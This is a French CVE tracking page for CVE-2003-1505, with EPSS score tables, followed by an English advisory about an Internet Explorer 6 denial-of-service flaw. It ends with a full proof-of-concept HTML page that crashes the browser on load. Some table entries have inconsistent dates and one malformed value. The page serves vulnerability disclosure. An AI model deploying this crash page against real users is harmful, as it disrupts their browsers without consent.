CVE-2003-1505 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	25.6%	–	–
2022-04-03	–	–	25.6%	–	–
2023-03-12	–	–	–	6.06%	–
2023-05-07	–	–	–	6.91%	–
2023-06-11	–	–	–	8.76%	–
2023-08-27	–	–	–	8.32%	–
2023-10-01	–	–	–	11.31%	–
2023-11-05	–	–	–	9.87%	–
2023-12-10	–	–	–	11.09%	–
2024-06-02	–	–	–	11.09%	–
2024-06-02	–	–	–	11.09%	–
2024-06-16	–	–	–	10.88%	–
2024-07-21	–	–	–	9%	–
2024-09-01	–	–	–	8.99%	–
2024-10-06	–	–	–	6.84%	–
2024-12-22	–	–	–	8.23%	–
2025-03-09	–	–	–	8.23%	–
2025-01-19	–	–	–	8.23%	–
2025-03-09	–	–	–	8.23%	–
2025-03-18	–	–	–	–	26.06%
2025-03-30	–	–	–	–	24.18%
2025-03-30	–	–	–	–	24.18,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	96%
2022-04-03	97%
2023-03-12	92%
2023-05-07	93%
2023-06-11	94%
2023-08-27	94%
2023-10-01	95%
2023-11-05	94%
2023-12-10	95%
2024-06-02	95%
2024-06-02	95%
2024-06-16	95%
2024-07-21	95%
2024-09-01	95%
2024-10-06	94%
2024-12-22	94%
2025-03-09	95%
2025-01-19	94%
2025-03-09	95%
2025-03-18	96%
2025-03-30	96%
2025-03-30	96%

source: https://www.securityfocus.com/bid/8874/info It has been reported that Microsoft Internet Explorer is prone to a vulnerability that may allow an attacker to cause a denial of service condition in the software. The problem occurs due to improper handling of scrollbar-base-color attribute of the div object. Successful exploitation of this issue may allow an attacker to create a webpage containing malicious script code that would cause a user's browser to crash upon visiting the site. Microsoft Internet Explorer 6.0 has been reported to be vulnerable to this issue, however other versions may be affected as well. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>CRASH-IE</title> <style type="text/css"> html, body { overflow-y: hidden; scrollbar-base-color: '#330066'; } .crash { position:absolute; left:200px; top:200px; width:200px; } </style> <script type="text/javascript"> function galgenfrist() { window.setTimeout('crashIE();',1000); } function crashIE() { var moveNode = document.getElementById("move"); if(moveNode) { moveNode.style.top = "100px"; moveNode.style.left = "200px"; } } </script> </head> <body onload="galgenfrist();"> <h1>CRASH-IE</h1> <div id="move" class="crash"> <table> <tbody> <tr> <td> <textarea>&lt;/textarea&gt; </td> </tr> </tbody> </table> </div> </body> </html>